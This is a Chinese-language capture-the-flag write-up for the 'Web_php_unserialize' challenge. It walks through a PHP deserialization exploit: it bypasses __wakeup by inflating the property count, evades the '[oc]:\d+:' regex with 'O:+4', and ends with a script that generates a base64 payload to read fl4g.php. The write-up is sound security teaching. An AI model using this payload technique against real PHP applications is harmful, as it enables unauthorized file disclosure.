攻防世界21-Web_php_unserialize-CTFWeb

跟反序列化有关

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

审计一下，对Demo这个类进行序列化并base64加密，赋值给var

提示了the secret is in the fl4g.php，因此目的是__destruct()中高亮显示出 fl4g.php，但是$this->file != ‘index.php’就是index.php，所以要绕过wakeup，之前提到过绕过方法就是当成员属性数目大于实际数目时可绕过wakeup方法

第二，注意到，preg_match(‘/[oc]:\d+:/i’, $var)，还有个正则匹配，意思是o或c:几个数字:，末尾的i==> 修饰符，表示忽略大小写，可以用+号来进行绕过。

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$a = new Demo('fl4g.php');
echo serialize($a);
?>

需要注意的是，s:10,他其实是有10个字符，并不是Demofile而是’\x00Demo\x00file’中间不是空格(\x20)，而是字符，所以不能复制结果，而要一次性转化。

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
$b = new Demo('fl4g.php');
$a = serialize($b);
$a = str_replace('O:4','O:+4',$a);
$a = str_replace('1:{','3:{',$a);
echo base64_encode($a);
?>